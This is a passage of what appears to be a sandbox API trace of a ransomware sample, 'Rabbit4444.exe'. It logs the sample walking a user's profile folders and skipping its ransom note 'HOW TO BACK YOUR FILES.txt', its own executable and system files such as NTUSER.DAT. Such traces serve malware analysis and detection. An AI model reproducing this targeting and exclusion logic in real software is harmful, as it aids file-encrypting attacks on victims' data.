ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0048.160] lstrcmpiW (lpString1="Desktop", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.160] lstrcmpiW (lpString1="Desktop", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.160] lstrcmpiW (lpString1="Desktop", lpString2="Rabbit4444.exe") returned -1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2=".") returned 1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="..") returned 1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="windows") returned -1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="bootmgr") returned 1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="pagefile.sys") returned -1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="boot") returned 1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="ids.txt") returned -1 [0048.161] lstrcmpiW (lpString1="Desktop", lpString2="NTUSER.DAT") returned -1 [0048.161] lstrcpyW (in: lpString1=0x130eb58, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0048.161] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop", dwFileAttributes=0x10) returned 1 [0048.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0048.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x30) returned 0xf7920 [0048.161] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63f0 [0048.161] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd1aba96, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd1aba96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="Rabbit4444.exe") returned -1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="bootmgr") returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="pagefile.sys") returned -1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="boot") returned 1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="ids.txt") returned -1 [0048.161] lstrcmpiW (lpString1="Documents", lpString2="NTUSER.DAT") returned -1 [0048.161] lstrcpyW (in: lpString1=0x130eb58, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0048.161] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents", dwFileAttributes=0x10) returned 1 [0048.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6568 [0048.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x1027d0 [0048.162] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6370 [0048.162] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc19bd8f2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc19bd8f2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="Rabbit4444.exe") returned -1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="bootmgr") returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="pagefile.sys") returned -1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="boot") returned 1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="ids.txt") returned -1 [0048.162] lstrcmpiW (lpString1="Downloads", lpString2="NTUSER.DAT") returned -1 [0048.162] lstrcpyW (in: lpString1=0x130eb58, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0048.162] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads", dwFileAttributes=0x10) returned 1 [0048.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0048.162] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102a10 [0048.162] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6570 [0048.162] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0048.162] lstrcmpiW (lpString1="Favorites", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.162] lstrcmpiW (lpString1="Favorites", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.162] lstrcmpiW (lpString1="Favorites", lpString2="Rabbit4444.exe") returned -1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="bootmgr") returned 1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="pagefile.sys") returned -1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="boot") returned 1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="ids.txt") returned -1 [0048.163] lstrcmpiW (lpString1="Favorites", lpString2="NTUSER.DAT") returned -1 [0048.163] lstrcpyW (in: lpString1=0x130eb58, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0048.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Favorites", dwFileAttributes=0x10) returned 1 [0048.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0048.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x34) returned 0x102a50 [0048.163] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6350 [0048.163] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="Rabbit4444.exe") returned -1 [0048.163] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="bootmgr") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="pagefile.sys") returned -1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="boot") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="ids.txt") returned 1 [0048.163] lstrcmpiW (lpString1="Links", lpString2="NTUSER.DAT") returned -1 [0048.163] lstrcpyW (in: lpString1=0x130eb58, lpString2="Links" | out: lpString1="Links") returned="Links" [0048.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Links", dwFileAttributes=0x10) returned 1 [0048.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0048.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2c) returned 0xf78b0 [0048.164] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf6410 [0048.164] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="Rabbit4444.exe") returned -1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2=".") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="..") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="windows") returned -1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="bootmgr") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="pagefile.sys") returned -1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="boot") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="ids.txt") returned 1 [0048.164] lstrcmpiW (lpString1="Local Settings", lpString2="NTUSER.DAT") returned -1 [0048.164] lstrcpyW (in: lpString1=0x130eb58, lpString2="Local Settings" | out: lpString1="Local Settings") returned="Local Settings" [0048.164] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Local Settings", dwFileAttributes=0x2412) returned 1 [0048.164] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Local Settings\r\n") returned 49 [0048.164] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Local Settings\r\n") returned 49 [0048.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.164] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5d0 [0048.164] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x31, lpOverlapped=0x0) returned 1 [0048.166] CloseHandle (hObject=0x278) returned 1 [0048.167] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xcd244396, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd244396, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="Rabbit4444.exe") returned -1 [0048.167] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0048.167] lstrcmpiW (lpString1="Music", lpString2="NTUSER.DAT") returned -1 [0048.167] lstrcpyW (in: lpString1=0x130eb58, lpString2="Music" | out: lpString1="Music") returned="Music" [0048.167] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music", dwFileAttributes=0x10) returned 1 [0048.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6428 [0048.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2c) returned 0xf7530 [0048.168] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6430 | out: ListHead=0xf68b0, ListEntry=0xf6430) returned 0xf6510 [0048.168] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="Rabbit4444.exe") returned -1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="bootmgr") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="pagefile.sys") returned -1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="boot") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="ids.txt") returned 1 [0048.168] lstrcmpiW (lpString1="My Documents", lpString2="NTUSER.DAT") returned -1 [0048.168] lstrcpyW (in: lpString1=0x130eb58, lpString2="My Documents" | out: lpString1="My Documents") returned="My Documents" [0048.168] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\My Documents", dwFileAttributes=0x2412) returned 1 [0048.172] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\My Documents\r\n") returned 47 [0048.172] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\My Documents\r\n") returned 47 [0048.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.172] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x601 [0048.172] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2f, lpOverlapped=0x0) returned 1 [0048.178] CloseHandle (hObject=0x278) returned 1 [0048.179] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="Rabbit4444.exe") returned -1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="bootmgr") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="pagefile.sys") returned -1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="boot") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="ids.txt") returned 1 [0048.179] lstrcmpiW (lpString1="NetHood", lpString2="NTUSER.DAT") returned -1 [0048.179] lstrcpyW (in: lpString1=0x130eb58, lpString2="NetHood" | out: lpString1="NetHood") returned="NetHood" [0048.179] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\NetHood", dwFileAttributes=0x2412) returned 1 [0048.180] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\NetHood\r\n") returned 42 [0048.180] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\NetHood\r\n") returned 42 [0048.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.180] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x630 [0048.180] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x2a, lpOverlapped=0x0) returned 1 [0048.181] CloseHandle (hObject=0x278) returned 1 [0048.182] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa9c141bf, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xa9c141bf, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Rabbit4444.exe") returned -1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="bootmgr") returned 1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="pagefile.sys") returned -1 [0048.182] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot") returned 1 [0048.183] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ids.txt") returned 1 [0048.183] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="NTUSER.DAT") returned 0 [0048.183] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Rabbit4444.exe") returned -1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="windows") returned -1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="bootmgr") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="pagefile.sys") returned -1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="boot") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="ids.txt") returned 1 [0048.183] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0048.183] lstrcpyW (in: lpString1=0x130eb58, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0048.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG1", dwFileAttributes=0x22) returned 1 [0048.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG1", dwFileAttributes=0x6) returned 1 [0048.183] lstrlenW (lpString="ntuser.dat.LOG1") returned 15 [0048.183] lstrlenW (lpString="Rabbit4444") returned 10 [0048.183] lstrcmpiW (lpString1="r.dat.LOG1", lpString2="Rabbit4444") returned -1 [0048.183] lstrlenW (lpString=".dll") returned 4 [0048.184] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0048.184] lstrlenW (lpString=".lnk") returned 4 [0048.184] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0048.184] lstrlenW (lpString=".ini") returned 4 [0048.184] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0048.184] lstrlenW (lpString=".sys") returned 4 [0048.184] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0048.184] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Rabbit4444.exe") returned -1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="windows") returned -1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="bootmgr") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="pagefile.sys") returned -1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="boot") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="ids.txt") returned 1 [0048.184] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0048.184] lstrcpyW (in: lpString1=0x130eb58, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0048.184] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG2", dwFileAttributes=0x22) returned 1 [0048.184] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\ntuser.dat.LOG2", dwFileAttributes=0x6) returned 1 [0048.184] lstrlenW (lpString="ntuser.dat.LOG2") returned 15 [0048.184] lstrlenW (lpString="Rabbit4444") returned 10 [0048.184] lstrcmpiW (lpString1="r.dat.LOG2", lpString2="Rabbit4444") returned -1 [0048.184] lstrlenW (lpString=".dll") returned 4 [0048.184] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0048.185] lstrlenW (lpString=".lnk") returned 4 [0048.185] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0048.185] lstrlenW (lpString=".ini") returned 4 [0048.185] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0048.185] lstrlenW (lpString=".sys") returned 4 [0048.185] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0048.185] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, 